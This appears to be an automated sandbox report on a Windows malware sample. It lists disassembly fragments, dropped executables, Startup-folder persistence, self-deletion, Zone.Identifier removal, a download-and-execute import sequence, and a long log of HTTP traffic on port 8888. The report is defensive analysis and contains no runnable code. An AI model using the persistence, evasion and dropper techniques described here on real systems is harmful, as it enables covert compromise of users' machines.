Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_00C41700 push eax; rep ret	1_2_00C4170D
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 4_2_00402DBA pushad ; retf	4_2_00402DBE
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 4_1_004029E2 push esi; iretd	4_1_00402AE5
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 4_1_00402A0F push esi; iretd	4_1_00402AE5
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 4_1_00402A13 push esi; iretd	4_1_00402AE5
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 4_1_00402A2C push esi; iretd	4_1_00402AE5
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 4_1_00402DBA pushad ; retf	4_1_00402DBE
Source: C:\Users\user\AppData\Roaming\ehdjcua	Code function: 15_2_009E355A pushad ; retf	15_2_009E355E
Source: C:\Users\user\AppData\Roaming\ehdjcua	Code function: 19_2_00402DBA pushad ; retf	19_2_00402DBE
Source: C:\Users\user\AppData\Roaming\ehdjcua	Code function: 19_1_00402DBA pushad ; retf	19_1_00402DBE
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0042B3BD push esi; ret	21_2_0042B3C6
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0040E5D5 push ecx; ret	21_2_0040E5E8
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F0C068 push esp; retf	21_2_02F0C070
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EFE825 push ecx; ret	21_2_02EFE838
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F0C666 push esp; retf	21_2_02F0C667
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F4BA45 push 89EF9C56h; retf	21_2_02F4BA4B
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F4ACC9 push cs; retf	21_2_02F4ACCA
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_02DBF4F0 pushfd ; iretd	25_2_02DBF4F1
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF64D3 push dword ptr [ebp+03h]; retn 0008h	25_2_05DF64D8
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF071F push cs; iretd	25_2_05DF0725
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF02AE push 00000048h; retf	25_2_05DF02B0

Source: initial sample	Static PE information: section name: .text entropy: 7.88476667522
Source: initial sample	Static PE information: section name: entropy: 7.97527343854
Source: initial sample	Static PE information: section name: .text entropy: 7.88476667522

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Code function: 21_2_00404CE0 GetModuleFileNameW,SHGetFolderPathW,DeleteUrlCacheEntryW,URLOpenBlockingStreamW,URLOpenBlockingStreamW,DeleteUrlCacheEntryW,URLDownloadToFileW,ShellExecuteW,

21_2_00404CE0

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ehdjcua	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9675.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\AD1D.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9C52.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9675.exe	File created: C:\ProgramData\Runtimebroker.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9163.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A329.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\9675.exe

File created: C:\ProgramData\Runtimebroker.exe

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ehdjcua

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\iuxjupoeo6.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\ehdjcua:Zone.Identifier read attributes | delete

Jump to behavior

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 47861
Source: unknown	Network traffic detected: HTTP traffic on port 47861 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 47861 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 8888
